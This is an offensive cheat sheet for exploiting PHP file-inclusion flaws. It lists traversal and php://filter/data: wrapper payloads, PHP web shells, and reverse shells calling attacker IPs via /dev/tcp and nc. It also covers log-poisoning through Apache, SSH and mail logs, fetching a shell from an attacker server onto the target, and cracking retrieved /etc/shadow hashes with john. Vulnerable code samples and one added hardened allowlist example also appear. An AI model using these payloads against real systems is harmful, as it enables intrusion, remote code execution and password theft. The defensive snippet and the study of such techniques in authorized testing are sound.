LFI
?file=php://filter/convert.base64-encode/resource=index.php
With this filter we should be able to see the (base64-encoded) source code.
Create an evil.txt with the content:
<?php system($_GET['cmd']); ?>
or a reverse shell:
<?php echo system("0<&196;exec 196<>/dev/tcp/192.168.119.212/443; sh <&196 >&196 2>&196"); ?>
http://IP/section.php?page=http%3A%2F%2F192.168.119.137%2Fevil.txt&cmd=whoami
The following executes an ls command:
data:text/plain,%3C?php%20echo%20shell_exec(%22ls%22)%20?%3E
http://IP/section.php?page=data:text/plain,%3C?php%20echo%20shell_exec(%22ls%22)%20?%3E
Basic insecure code
<?php
$file = $_GET['file'];
include('directory/' . $file);
?>
Example URL: http://10.10.10.10/index.php?file=../../../../../../../etc/passwd
Basic insecure code
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
Example URL: http://10.10.10.10/index.php?file=../../../../../../../etc/passwd
Secure code - more secure than the above, but still exploitable
<?php
if(isset($_GET['file']))
{
$file=str_replace('../','',$_GET['file']);
$file=str_replace('./','',$file);
echo @file_get_contents('./'.$file);
}
?>
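A hardened version of the include logic above, added here as an example (not code from the original notes): instead of stripping `../`, it allowlists page names and verifies that the resolved path stays inside an assumed `pages/` directory, which also rejects the `php://`, `data:` and `http://` wrapper payloads listed on this page. The directory name and the page list are assumptions.

```php
<?php
// Added example, not from the original notes: a hardened replacement for the
// str_replace()-based filter above. Two independent controls are applied:
//   1. an allowlist of page names (the only parameter values the app accepts), and
//   2. a realpath() check that the resolved file stays inside the pages directory,
// so stream wrappers (php://, data:, http://) and traversal never reach include().
// PAGES_DIR and ALLOWED_PAGES are assumptions for illustration.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';               // assumed location of includable pages
const ALLOWED_PAGES = ['index', 'about', 'contact']; // assumed allowlist

function resolvePage(string $requested): ?string
{
    // Only plain names are acceptable; anything containing a slash, dot, colon
    // or NUL byte (../, php://, %00) is rejected before touching the filesystem.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');

    // Defence in depth: even with an allowlisted name, the canonical path must
    // sit under the pages directory (catches symlinks and misconfiguration).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'index';
$page = is_string($page) ? $page : '';   // arrays and other non-strings are rejected
$target = resolvePage($page);

if ($target === null) {
    // Log the rejected value (hex-encoded) for detection; never echo it back unescaped.
    error_log('Rejected page parameter: ' . bin2hex(substr($page, 0, 64)));
    http_response_code(404);
    exit('Page not found');
}
include $target;
```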
http://example.com/index.php?page=../../../etc/passwd%00 // Only applies to PHP 5.3.4 and below
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
<?php system($_GET['c']); ?>
<?php system($_REQUEST['c']); ?>
<?php
$os = shell_exec('id');
echo "<pre>$os</pre>";
?>
<?php
$os = shell_exec('nc 10.10.10.10 4444 -e /bin/bash');
?>
// Replace IP & Port
Dangerous PHP Functions that can be abused for RCE
<?php
print_r(preg_grep("/^(system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source)$/", get_defined_functions(TRUE)["internal"]));
?>
Example URL: http://10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log
Payload: curl "http://192.168.8.108/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
Execute RCE: http://10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log&c=id
OR
python -m SimpleHTTPServer 9000
Payload: curl "http://<remote_ip>/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://<local_ip>:9000/shell-php-rev.php')) ?>"
file_put_contents('shell.php') // The filename it will be saved under on the target
file_get_contents('http://<local_ip>:9000/shell-php-rev.php') // Where the shell is on YOUR machine and what it is called
Execute PHP Reverse Shell: http://10.10.10.10/shell.php
Example URL: http://10.10.10.10/index.php?file=../../../../../../../var/log/auth.log
Payload: ssh <?php system($_GET['c']);?>@<target_ip>
Execute RCE: http://10.10.10.10/index.php?file=../../../../../../../var/log/auth.log&c=id
Example URL: http://10.10.10.10/index.php?file=../../../../../../../var/log/mail.log
telnet <target_ip> 25 // Replace with the target IP
MAIL FROM:<[email protected]>
RCPT TO:<?php system($_GET['c']); ?>
Execute RCE: http://10.10.10.10/index.php?file=../../../../../../../var/log/mail.log&c=id
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
If both /etc/passwd and /etc/shadow were retrieved, use unshadow to combine them and crack the passwords.
Syntax: unshadow pass.txt shadow.txt > hash
Then crack it with john:
john --wordlist=/usr/share/wordlists/rockyou.txt hash